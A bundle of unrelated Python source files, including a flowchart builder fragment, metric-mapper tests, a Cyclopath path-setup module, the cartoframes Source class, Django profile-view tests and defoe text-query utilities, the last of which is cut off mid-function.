print("body: %s"% str(body))
body_flow = get_handle(body)
print("body flow: %s" % str(body_flow))
if len(code)-1 and code[1] == "else:":
print("ELSE CLAUSE PRESENT")
else_body = list()
print(code)
del code[1]
while (len(code)-1) and code[1][0] == "~":
print(code)
else_body.append(code[1][1:])
del code[1]
print("else body: %s" % str(else_body))
else_body_flow = get_handle(else_body)
print("else body flow: %s" % str(else_body_flow))
con_br.if_yes(body_flow[0])
con_br.if_no(else_body_flow[0])
body_flow[-1].connect(blank)
else_body_flow[-1].connect(blank)
else:
con_br.if_yes(body_flow[0])
body_flow[-1].connect(blank)
con_br.if_no(blank)
print(nodes)
if len(nodes):
nodes[-1].connect(con_br)
else:
nodes.append(con_br)
nodes.append(blank)
elif read.match(line):
this = InputNode(read.match(line).groups()[0])
if len(nodes):
nodes[-1].connect(this)
nodes.append(this)
elif write.match(line):
this = OutputNode(write.match(line).groups()[0])
if len(nodes):
nodes[-1].connect(this)
nodes.append(this)
else:
this = Node(line)
if len(nodes):
nodes[-1].connect(this)
nodes.append(this)
del code[0]
print(nodes)
return nodes
process = get_handle(lines)
begin = StartNode()
begin.connect(process[0])
end = StopNode()
process[-1].connect(end)
pickle.dump(begin, open(argv[2], "wb")) |
# Copyright 2019, Aiven, https://aiven.io/
from logging import getLogger
from sfxbridge.mapper import Mapper
from sfxbridge.maps.metrics import DataPointType
log = getLogger(__name__)
def test_simple_mapping():
mapper = Mapper(log=log, whitelist=["load.midterm"], service=None)
mapper.process([
{
"fields": {
"load1": 0.54,
"load15": 0.23,
"load5": 0.47,
"n_cpus": 1,
"n_users": 1
},
"name": "system",
"tags": {
"cloud": "google-europe-north1",
"host": "pg-2",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444470
},
])
assert mapper.datapoints == {
DataPointType.gauge: [{
"dimensions": {
"cluster": "pg",
"host": "pg-2",
"plugin": "load",
},
"metric": "load.midterm",
"value": 0.47,
"timestamp": 1570444470000,
}]
}
# Test constructed metrics
def test_cpu_utilization():
mapper = Mapper(log=log, whitelist=["cpu.utilization"], service=None)
mapper.process([
{
"fields": {
"usage_guest": 0,
"usage_guest_nice": 0,
"usage_idle": 90.9303101033699,
"usage_iowait": 1.4671557185728608,
"usage_irq": 0.26675558519508497,
"usage_nice": 0,
"usage_softirq": 0.13337779259753063,
"usage_steal": 0,
"usage_system": 2.4341447149050466,
"usage_user": 4.768256085361656
},
"name": "cpu",
"tags": {
"cloud": "google-europe-north1",
"cpu": "cpu-total",
"host": "pg-2",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444500
},
])
assert mapper.datapoints == {
DataPointType.gauge: [{
"dimensions": {
"cluster": "pg",
"host": "pg-2",
"plugin": "signalfx-metadata",
},
"metric": "cpu.utilization",
"value": 9.07,
"timestamp": 1570444500000,
}]
}
def test_network_total():
mapper = Mapper(log=log, whitelist=["network.total"], service=None)
mapper.process([
{
"fields": {
"bytes_recv": 156796692,
"bytes_sent": 24029619,
"drop_in": 0,
"drop_out": 0,
"err_in": 0,
"err_out": 0,
"packets_recv": 168056,
"packets_sent": 100486
},
"name": "net",
"tags": {
"cloud": "google-europe-north1",
"host": "pg-2",
"interface": "eth0",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444500
},
{
"fields": {
"icmp_inaddrmaskreps": 0,
"icmp_inaddrmasks": 0,
"udplite_outdatagrams": 0,
"udplite_rcvbuferrors": 0,
"udplite_sndbuferrors": 0
},
"name": "net",
"tags": {
"cloud": "google-europe-north1",
"host": "pg-2",
"interface": "all",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444500,
},
])
assert mapper.datapoints == {
DataPointType.counter: [{
"dimensions": {
"cluster": "pg",
"host": "pg-2",
},
"metric": "network.total",
"value": 156796692 + 24029619,
"timestamp": 1570444500000,
}]
}
|
# Copyright (c) 2006-2013 Regents of the University of Minnesota.
# For licensing terms, see the file LICENSE.
import os
import sys
# Pyserver's conf.py wants the pyserver directory to be the current directory.
# And for importing pyserver sub-modules to work, we need the pyserver
# directory to be the current directory. We also need to add the dir to
# sys.path.
# SYNC_ME: Search pyserver module name.
dirname_pyserver = 'pyserver'
# Check that INSTANCE is set.
# FIXME: Should INSTANCE (and other env vars) be commonly prefixed?
# E.g., CCP_INSTANCE, CCP_PYSERVER_HOME, etc.?
# And just what are all the env vars that Cyclopath uses?
try:
from mod_python import apache
# This means we're running from apache. And under apache, INSTANCE isn't
# set. But we can tell what instance is specifed in httpd.conf by reading
# its PythonInterpreter value. Note that every Cyclopath installation on
# the server has a unique name that goes [instance]___[my_ccp_dev_dir],
# e.g., minnesota___ccpv3_trunk
instance_raw = apache.interpreter
# See /var/log/apache2/error.log, or maybe /ccp/var/log/apache2/error.log.
error_log = apache.log_error
except ImportError:
# We have yet to set up logging; log to, e.g., /var/log/apache2/error.log.
error_log = sys.stderr.write
try:
instance_raw = os.environ['INSTANCE']
except KeyError:
instance_raw = ''
#
uniquely_starts = instance_raw.find('___')
if uniquely_starts != -1:
instance_name = instance_raw[:uniquely_starts]
else:
instance_name = instance_raw
# We used to set an env. var. but let's avoid a race condition with other
# Apache forks, since the env. seems to be shared among our processes.
# No: os.environ['INSTANCE'] = instance_name
#
if not instance_name:
error_log('ERROR: Please set the INSTANCE environment variable (py_glue).')
sys.exit(1)
# We hard-code the path separator, so make sure it's what we think 'tis.
assert(os.path.sep == '/') # We only run on Linux.
# If $PYSERVER_HOME is set, but to the wrong path, you'll get weird errors,
# e.g., ./ccp.py -i ==> ConfigParser.NoSectionError: No section: 'gwis'.
# because $PYSERVER_HOME set to a V1 path.
try:
# See if the user or script supplied the directory as an environment var.
# SYNC_ME: Search environment variable: PYSERVER_HOME.
pyserver_home = os.environ['PYSERVER_HOME']
except KeyError:
# Otherwise, if the user or script is running this script from somewhere
# within the Cyclopath source directory, we can deduce pyserver's home.
# NOTE: sys.path[0] is the absolute path to the script, which we need to
# use in case the calling script was invoked from a directory other
# than its own.
# NOTE: If you run py interactively, sys.path[0] is '', and abspath('')
# resolves to the current directory...
walk_path = os.path.abspath(sys.path[0])
depth = 1
pyserver_home = ''
while not pyserver_home:
# EXPLAIN: Why doesn't this use os.path.join?
test_this_path = os.path.abspath('%s/%s' % (walk_path,
dirname_pyserver,))
#print 'test_this_path: %s' % (test_this_path,)
# See if the test path is really a path.
if os.path.isdir(test_this_path):
# Ooh, this iss good news. See if we can find ourselves a VERSION.py.
# Note that this will have required that flashclient has beed maked.
if os.path.isfile('%s/VERSION.py' % (test_this_path)):
# Whooptie-doo! We have ourselves a pyserver_home.
pyserver_home = test_this_path
break
# If we didn't find pyserver_home, try the next directory in the
# ancestry, and do some error checking.
assert(not pyserver_home) # There's a 'break' above...
new_walk_path = os.path.dirname(walk_path)
assert(new_walk_path != walk_path)
walk_path = new_walk_path
# If we hit rock bottom...
if walk_path == '/':
sys.stderr.write('Got to root. Something is wrong. Buh-bye!\n')
sys.exit(1)
# Increse your loop confidence.
# MAGIC NUMBER: Just guessing that 32 is very unlikely path depth.
depth += 1
if depth > 32:
sys.stderr.write('Tired of looping. Giving up!\n')
sys.exit(1)
# Set the PYSERVER_HOME env var for the rest of the app.
# NO: Race conidition with our Cyclopath server installations:
# The next URL request -- even on a different server install --
# will inherit the environment variables for this process. So
# don't set environment variables inside the app.
# No: os.environ['PYSERVER_HOME'] = pyserver_home
# 2013.09.03: Let's add mapserver/ to the path, too, so we can always skin.
mapserver_home = '%s/mapserver' % (os.path.dirname(pyserver_home),)
sys.path.insert(0, mapserver_home)
# 2013.10.24: Let's add services/ to the path, too.
services_home = '%s/services' % (os.path.dirname(pyserver_home),)
sys.path.insert(0, services_home)
sys.path.insert(0, pyserver_home)
os.chdir(pyserver_home)
if __name__ == '__main__':
import conf
print 'Seems OK...'
|
<reponame>oss-spanish-geoserver/cartoframes
from __future__ import absolute_import
import re
import pandas
from . import defaults
from ..geojson import get_encoded_data, get_bounds
from ..data import Dataset, get_query, get_geodataframe
try:
import geopandas
HAS_GEOPANDAS = True
except ImportError:
HAS_GEOPANDAS = False
class SourceType:
QUERY = 'Query'
GEOJSON = 'GeoJSON'
class Source(object):
"""Source
Args:
data (str, :py:class:`GeoFrame <geopandas.GeoDataFrame>`,
:py:class:`Dataset <cartoframes.viz.Dataset>` ): a table name, SQL query
,GeoJSON file, GeoFrame object or Dataset object.
context (:py:class:`Context <cartoframes.Context>`):
A Conext instance. If not provided the context will be automatically
obtained from the default context.
bounds (dict or list): a dict with `east`,`north`,`west`,`south`
properties, or a list of floats in the following order: [west,
south, east, north]. If not provided the bounds will be automatically
calculated to fit all features.
Example:
Table name.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('table_name')
SQL query.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('SELECT * FROM table_name')
GeoJSON file.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('path/to/file.geojson')
Dataset object.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
from cartoframes.data import Dataset
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
ds = Dataset.from_table('table_name')
Source(ds)
Setting the context.
.. code::
from cartoframes.auth import Context
from cartoframes.viz import Source
context = Context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('table_name', context)
Setting the bounds.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
bounds = {
'west': -10,
'east': 10,
'north': -10,
'south': 10
}
Source('table_name', bounds=bounds)
"""
def __init__(self, data, context=None, bounds=None, schema=None):
self._init_source(data, context, bounds, schema)
self.context = _get_context(self.dataset)
self.geom_type = _get_geom_type(self.dataset)
self.credentials = _get_credentials(self.dataset)
def _init_source(self, data, context, bounds, schema):
if isinstance(data, str):
if _check_sql_query(data):
self._init_source_query(data, context, bounds)
elif _check_geojson_file(data):
self._init_source_geojson(data, bounds)
elif _check_table_name(data):
self._init_source_table(data, context, schema, bounds)
elif isinstance(data, (list, dict)):
self._init_source_geojson(data, bounds)
elif HAS_GEOPANDAS and isinstance(data, geopandas.GeoDataFrame):
self._init_source_geodataframe(data, bounds)
elif isinstance(data, pandas.DataFrame):
self._init_source_dataframe(data, bounds)
elif isinstance(data, Dataset):
self._init_source_dataset(data, bounds)
else:
raise ValueError('Wrong source input')
def _init_source_table(self, data, context, schema, bounds):
self.dataset = Dataset.from_table(data, context, schema)
self._set_source_query(self.dataset, bounds)
def _init_source_query(self, data, context, bounds):
self.dataset = Dataset.from_query(data, context)
self._set_source_query(self.dataset, bounds)
def _init_source_geojson(self, data, bounds):
self.dataset = Dataset.from_geojson(data)
self._set_source_geojson(self.dataset, bounds)
def _init_source_geodataframe(self, data, bounds):
self.dataset = Dataset.from_geodataframe(data)
self._set_source_geojson(self.dataset, bounds)
def _init_source_dataframe(self, data, bounds):
self.dataset = Dataset.from_dataframe(data)
self._set_source_geojson(self.dataset, bounds)
def _init_source_dataset(self, data, bounds):
self.dataset = data
if self.dataset._state == Dataset.STATE_REMOTE:
self._set_source_query(self.dataset, bounds)
elif self.dataset._state == Dataset.STATE_LOCAL:
self._set_source_geojson(self.dataset, bounds)
def _set_source_query(self, dataset, bounds):
self.type = SourceType.QUERY
self.query = get_query(dataset)
self.bounds = bounds
def _set_source_geojson(self, dataset, bounds):
self.type = SourceType.GEOJSON
gdf = get_geodataframe(dataset)
self.query = get_encoded_data(gdf)
self.bounds = bounds or get_bounds(gdf)
def _check_table_name(data):
return True
def _check_sql_query(data):
return re.match(r'^\s*(WITH|SELECT)\s+', data, re.IGNORECASE)
def _check_geojson_file(data):
return re.match(r'^.*\.geojson\s*$', data, re.IGNORECASE)
def _get_context(dataset):
return dataset.context
def _get_credentials(dataset):
context = _get_context(dataset)
if context and context.creds:
return {
'username': context.creds.username(),
'api_key': context.creds.key(),
'base_url': context.creds.base_url()
}
else:
return defaults.CREDENTIALS
def _get_geom_type(dataset):
return dataset.compute_geom_type() or Dataset.GEOM_TYPE_POINT
|
<gh_stars>0
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.encoding import iri_to_uri
import mock
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from test_utils import TestCase
from remo.base.tests import requires_permission, requires_login
from remo.profiles.tests import FunctionalAreaFactory, UserFactory
class ViewsTest(TestCase):
"""Tests related to Profiles Views."""
def setUp(self):
"""Setup tests."""
self.mentor = UserFactory.create(groups=['Rep', 'Mentor'],
userprofile__initial_council=True)
self.rep = UserFactory.create(groups=['Rep'],
userprofile__mentor=self.mentor)
self.area = FunctionalAreaFactory.create()
profile = self.rep.userprofile
self.data = {'display_name': profile.display_name,
'first_name': self.rep.first_name,
'email': self.rep.email,
'last_name': self.rep.last_name,
'local_name': profile.local_name,
'private_email': self.rep.email,
'twitter_account': profile.twitter_account,
'city': profile.city,
'region': profile.region,
'country': profile.country,
'lon': profile.lat,
'lat': profile.lon,
'mozillians_profile_url': profile.mozillians_profile_url,
'wiki_profile_url': profile.wiki_profile_url,
'jabber_id': u'<EMAIL>',
'irc_name': profile.irc_name,
'linkedin_url': u'http://www.linkedin.com/',
'facebook_url': u'http://www.facebook.com/',
'diaspora_url': u'https://joindiaspora.com/',
'personal_website_url': u'http://www.example.com/',
'personal_blog_feed': u'http://example.com/',
'bio': u'This is my bio.',
'date_joined_program': '2011-07-01',
'mentor': profile.mentor.id,
'functional_areas': self.area.id}
display_name = {'display_name': profile.display_name}
self.user_url = reverse('profiles_view_profile', kwargs=display_name)
self.user_edit_url = reverse('profiles_edit', kwargs=display_name)
self.user_delete_url = reverse('profiles_delete', kwargs=display_name)
def test_view_my_profile_page(self):
"""Get my profile page."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_view_my_profile'))
self.assertTemplateUsed(response, 'profiles_view.html')
def test_view_invite_page(self):
"""Get invite page."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_invite'))
self.assertTemplateUsed(response, 'profiles_invite.html')
def test_view_list_profiles_page(self):
"""Get list profiles page."""
response = self.client.get(reverse('profiles_list_profiles'))
self.assertTemplateUsed(response, 'profiles_people.html')
def test_view_profile_page(self):
"""Get profile page."""
response = self.client.get(self.user_url)
self.assertTemplateUsed(response, 'profiles_view.html')
def test_view_edit_profile_page(self):
"""Get edit profile page."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(self.user_edit_url)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_view_delete_profile_page(self):
"""Get delete profile page."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.get(self.user_delete_url, follow=True)
self.assertTemplateUsed(response, 'main.html')
def test_invite_user(self):
"""Test that user is invited."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
self.client.post(reverse('profiles_invite'),
{'email': '<EMAIL>'})
u = User.objects.get(email='<EMAIL>')
eq_(u.userprofile.added_by, self.mentor)
ok_(u.groups.filter(name='Rep').exists())
def test_edit_profile_permissions_owner(self):
"""Test owner permissions to edit profiles."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(self.user_edit_url, follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_edit_profile_permissions_admin(self):
"""Test admin permission to edit profile."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.get(self.user_edit_url, follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
@requires_permission()
def test_edit_profile_no_permissions(self):
"""Test user edit other user profile without permission."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
self.client.get(self.user_edit_url, follow=True)
def test_edit_profile_redirect_admin(self):
"""Test that after edit profile redirection is correct."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.post(self.user_edit_url, self.data, follow=True)
eq_(response.request['PATH_INFO'], self.user_url)
def test_edit_owner_profile_redirect(self):
"""Test that after edit profile redirection is correct."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.post(self.user_edit_url, self.data, follow=True)
eq_(response.request['PATH_INFO'], reverse('profiles_view_my_profile'))
def test_delete_own_profile(self):
"""Test owner can't delete his profile."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.post(self.user_delete_url, follow=True)
self.assertTemplateUsed(response, 'main.html')
ok_(User.objects.filter(pk=self.rep.id).exists())
@requires_permission()
def test_delete_user_delete_profile_no_perms(self):
"""Test user can't delete profile without permissions."""
user = UserFactory.create(groups=['Rep'])
self.client.login(username=user.username, password='<PASSWORD>')
self.client.post(self.user_delete_url, follow=True)
ok_(User.objects.filter(pk=self.rep.id).exists())
def test_delete_profile_admin(self):
"""Test admin can delete profile."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.post(self.user_delete_url, {'delete': 'true'},
follow=True)
self.assertTemplateUsed(response, 'main.html')
ok_(not User.objects.filter(pk=self.rep.id).exists())
def test_profiles_me(self):
"""Test that user gets own profile rendered."""
# user gets own profile page rendered
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_view_my_profile'),
follow=True)
self.assertTemplateUsed(response, 'profiles_view.html')
@requires_login()
def test_profiles_me_anonymous(self):
# anonymous user get message to login first
self.client.get(reverse('profiles_view_my_profile'), follow=True)
def test_incomplete_profile(self):
"""Test user redirection when profile is incomplete"""
# First name is empty to keep registration_complete=False
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
self.client.login(username=user.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_view_my_profile'),
follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_case_insensitive_profile_url(self):
"""Test the display_name is case insensitive in profile urls."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
name = self.rep.userprofile.display_name.upper()
response = self.client.get(reverse('profiles_view_profile',
kwargs={'display_name': name}),
follow=True)
self.assertTemplateUsed(response, 'profiles_view.html')
response = self.client.get(reverse('profiles_edit',
kwargs={'display_name': name}),
follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_number_of_reps_visibility_unauthed(self):
"""Test visibility of number of reps based on authentication status."""
response = self.client.get(reverse('profiles_list_profiles'),
follow=True)
d = pq(response.content)
eq_(len(d('#profiles-number-of-reps')), 0)
def test_number_of_reps_visibility_authenticated(self):
"""Test visibility of number of reps based on authentication status."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_list_profiles'),
follow=True)
d = pq(response.content)
eq_(len(d('#profiles-number-of-reps')), 1)
def test_view_incomplete_profile_page_unauthed(self):
"""Test permission to view incomplete profile page unauthenticated."""
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
name = user.userprofile.display_name
url = reverse('profiles_view_profile',
kwargs={'display_name': name})
response = self.client.get(url, follow=True)
self.assertTemplateUsed(response, '404.html',
'Anonymous can view the page')
def test_view_incomplete_profile_page_authenticated(self):
"""Test view incomplete profile page without permissions."""
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
name = user.userprofile.display_name
url = reverse('profiles_view_profile',
kwargs={'display_name': name})
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(url, follow=True)
self.assertTemplateUsed(response, '404.html',
'Rep without permission can view the page')
def test_view_incomplete_profile_page_admin(self):
"""Test permission to view incomplete profile page as admin."""
admin = UserFactory.create(groups=['Admin'])
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
name = user.userprofile.display_name
url = reverse('profiles_view_profile',
kwargs={'display_name': name})
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.get(url, follow=True)
self.assertTemplateUsed(response, 'profiles_view.html',
'Admin can\'t view the page')
@mock.patch('remo.profiles.views.iri_to_uri', wraps=iri_to_uri)
def test_view_redirect_list_profiles(self, mocked_uri):
"""Test redirect to profiles list."""
profiles_url = '/people/Paris & Orléans'
response = self.client.get(profiles_url, follow=True)
mocked_uri.assert_called_once_with(u'/Paris & Orléans')
expected_url = '/people/#/Paris%20&%20Orl%C3%A9ans'
self.assertRedirects(response, expected_url=expected_url,
status_code=301, target_status_code=200)
self.assertTemplateUsed(response, 'profiles_people.html')
def test_functional_areas_type(self):
"""Test that functional area type is integer."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
# Post form with invalid data
self.data['wiki_profile_url'] = 'www.example.com'
response = self.client.post(self.user_edit_url, self.data, follow=True)
eq_(response.context['functional_areas'], [self.area.id])
|
"""
Query-related utility functions.
"""
from defoe import query_utils
from defoe.query_utils import PreprocessWordType, longsfix_sentence, xml_geo_entities, georesolve_cmd, coord_xml, geomap_cmd, geoparser_cmd, geoparser_coord_xml
from nltk.corpus import words
import re
import spacy
from spacy.tokens import Doc
from spacy.vocab import Vocab
NON_AZ_REGEXP = re.compile('[^a-z]')
from nltk.corpus import words
def get_pages_matches_no_prep(title, edition, archive, filename, text, keysentences):
"""
Get pages within a document that include one or more keywords.
For each page that includes a specific keyword, add a tuple of
form:
(<TITLE>, <EDITION>, <ARCHIVE>, <FILENAME>, <TEXT>, <KEYWORD>)
If a keyword occurs more than once on a page, there will be only
one tuple for the page for that keyword.
If more than one keyword occurs on a page, there will be one tuple
per keyword.
:return: list of tuples
"""
matches = []
for keysentence in keysentences:
#sentence_match = get_sentences_list_matches(text, keysentence)
sentence_match_idx = get_text_keyword_idx(text, keysentence)
if sentence_match:
match = (title, edition, archive, filename, text, keysentence)
matches.append(match)
return matches
def get_page_matches(document,
keywords,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Get pages within a document that include one or more keywords.
For each page that includes a specific keyword, add a tuple of
form:
(<YEAR>, <DOCUMENT>, <PAGE>, <KEYWORD>)
If a keyword occurs more than once on a page, there will be only
one tuple for the page for that keyword.
If more than one keyword occurs on a page, there will be one tuple
per keyword.
:param document: document
:type document: defoe.nls.document.Document
:param keywords: keywords
:type keywords: list(str or unicode:
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: list of tuples
:rtype: list(tuple)
"""
matches = []
for keyword in keywords:
for page in document:
match = None
for word in page.words:
preprocessed_word = query_utils.preprocess_word(
word, preprocess_type)
if preprocessed_word == keyword:
match = (document.year, document, page, keyword)
break
if match:
matches.append(match)
continue # move to next page
return matches
def get_document_keywords(document,
keywords,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Gets list of keywords occuring within an document.
:param article: Article
:type article: defoe.papers.article.Article
:param keywords: keywords
:type keywords: list(str or unicode)
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: sorted list of keywords that occur within article
:rtype: list(str or unicode)
"""
matches = set()
for page in document:
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if preprocessed_word in keywords:
matches.add(preprocessed_word)
return sorted(list(matches))
def document_contains_word(document,
keyword,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Checks if a keyword occurs within an article.
:param article: Article
:type article: defoe.papers.article.Article
:param keywords: keyword
:type keywords: str or unicode
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: True if the article contains the word, false otherwise
:rtype: bool
"""
for page in document:
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if keyword == preprocessed_word:
return True
return False
def calculate_words_within_dictionary(page,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Calculates the % of page words within a dictionary and also returns the page quality (pc)
Page words are normalized.
:param page: Page
:type page: defoe.nls.page.Page
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:return: matches
:rtype: list(str or unicode)
"""
dictionary = words.words()
counter= 0
total_words= 0
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word, preprocess_type)
if preprocessed_word!="":
total_words += 1
if preprocessed_word in dictionary:
counter += 1
try:
calculate_pc = str(counter*100/total_words)
except:
calculate_pc = "0"
return calculate_pc
def calculate_words_confidence_average(page):
"""
Calculates the average of "words confidence (wc)" within a page.
Page words are normalized.
:param page: Page
:type page: defoe.nls.page.Page
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:return: matches
:rtype: list(str or unicode)
"""
dictionary = words.words()
counter= 0
total_wc= 0
for wc in page.wc:
total_wc += float(wc)
try:
calculate_wc = str(total_wc/len(page.wc))
except:
calculate_wc = "0"
return calculate_wc
def get_page_as_string(page,
preprocess_type=PreprocessWordType.LEMMATIZE):
"""
Return a page as a single string.
:param page: Page
:type page: defoe.nls.Page
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: page words as a string
:rtype: string or unicode
"""
page_string = ''
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if page_string == '':
page_string = preprocessed_word
else:
page_string += (' ' + preprocessed_word)
return page_string
def clean_page_as_string(page):
"""
Clean a page as a single string,
Handling hyphenated words: combine and split and also fixing the long-s
:param page: Page
:type page: defoe.nls.Page
:return: clean page words as a string
:rtype: string or unicode
"""
page_string = ''
for word in page.words:
if page_string == '':
page_string = word
else:
page_string += (' ' + word)
page_separeted = page_string.split('- ')
page_combined = ''.join(page_separeted)
if (len(page_combined) > 1) and ('f' in page_combined):
page_clean = longsfix_sentence(page_combined)
else:
page_clean= page_combined
page_final=page_clean.split()
page_string_final = ''
for word in page_final:
if "." not in word:
separated_str = re.sub(r'([a-z](?=[A-Z])|[A-Z](?=[A-Z][a-z]))', r'\1 ', word)
else:
separated_str = word
if page_string_final == '':
page_string_final = separated_str
else:
page_string_final += (' ' + separated_str)
return page_string_final
def preprocess_clean_page(clean_page,
preprocess_type=PreprocessWordType.LEMMATIZE):
clean_list = clean_page.split(' ')
page_string = ''
for word in clean_list:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if page_string == '':
page_string = preprocessed_word
else:
page_string += (' ' + preprocessed_word)
return page_string
def get_sentences_list_matches(text, keysentence):
"""
Check which key-sentences from occurs within a string
and return the list of matches.
:param text: text
:type text: str or unicode
:type: list(str or uniocde)
:return: Set of sentences
:rtype: set(str or unicode)
"""
match = []
text_list= text.split()
for sentence in keysentence:
if len(sentence.split()) > 1:
if sentence in text:
count = text.count(sentence)
for i in range(0, count):
match.append(sentence)
else:
pattern = re.compile(r'^%s$'%sentence)
for word in text_list:
if re.search(pattern, word):
match.append(sentence)
return sorted(match)
def preprocess_clean_page_spacy(clean_page,
preprocess_type=PreprocessWordType.LEMMATIZE):
clean_list = clean_page.split(' ')
page_string = ''
for word in clean_list:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if page_string == '':
page_string = preprocessed_word
else:
page_string += (' ' + preprocessed_word)
return page_string
def preprocess_clean_page_spacy(clean_page):
nlp = spacy.load('en')
doc = nlp(clean_page)
page_nlp_spacy=[]
for i, word in enumerate(doc):
word_normalized=re.sub(NON_AZ_REGEXP, '', word.text.lower())
output="%d\t%s\t%s\t%s\t%s\t%s\t%s\t"%( i+1, word, word_normalized, word.lemma_, word.pos_, word.tag_, word.ent_type_)
page_nlp_spacy.append(output)
return page_nlp_spacy
def georesolve_page_2(text, lang_model):
#print("---> Clean_Text to analyse %s" %text)
nlp = spacy.load(lang_model)
doc = nlp(text)
#print("---> DOC -NLP to analyse %s" %doc)
if doc.ents:
flag,in_xml = xml_geo_entities(doc)
if flag == 1:
geo_xml=georesolve_cmd(in_xml)
dResolved_loc= coord_xml(geo_xml)
#print("ROSA-3- My final result %s" % dResolved_loc)
return dResolved_loc
else:
return {}
else:
return {}
def georesolve_page(doc):
if doc.ents:
flag,in_xml = xml_geo_entities(doc)
if flag == 1:
geo_xml=georesolve_cmd(in_xml)
dResolved_loc= coord_xml(geo_xml)
return dResolved_loc
else:
return {}
else:
return {}
def geoparser_page(text):
geo_xml=geoparser_cmd(text)
dResolved_loc= geoparser_coord_xml(geo_xml)
return dResolved_loc
def geomap_page(doc):
geomap_html = ''
if doc.ents:
flag,in_xml = xml_geo_entities(doc)
if flag == 1:
geomap_html=geomap_cmd(in_xml)
#return str(geomap_html)
return geomap_html
def get_articles_nls(text):
text_list= text.split()
terms_view=[s.isupper() for s in text_list]
latin_view=[s in words.words() for s in text_list]
num_words= len(terms_view)
articles_page={}
if num_words > 10:
key='previous_page'
articles_page[key]=''
half_key=''
latin_key=''
cont = 0
repeated_key={}
for i in range(0, len(terms_view)):
flag = 0
word= text_list[i].split(",")[0]
#term in uppercase
#print("Studyng: %s - current key: %s, current half_key: %s, current lating_key: %s, current text in the key: %s" %(text_list[i], key, half_key, latin_key, articles_page[key]))
if terms_view[i]:
# UPPERCASE WITHOUT COMMA
if ',' not in text_list[i]:
#ACQUIENTANDIS plegiis, - managing ACQUIETANDIS - normally uppercase in latin too.
# EXCLUDING N. W. of Genova
if (not latin_view[i]) and ('.' not in text_list[i]):
if (i< num_words -1):
#checking that the next one is lowe case - e.g. pleggis
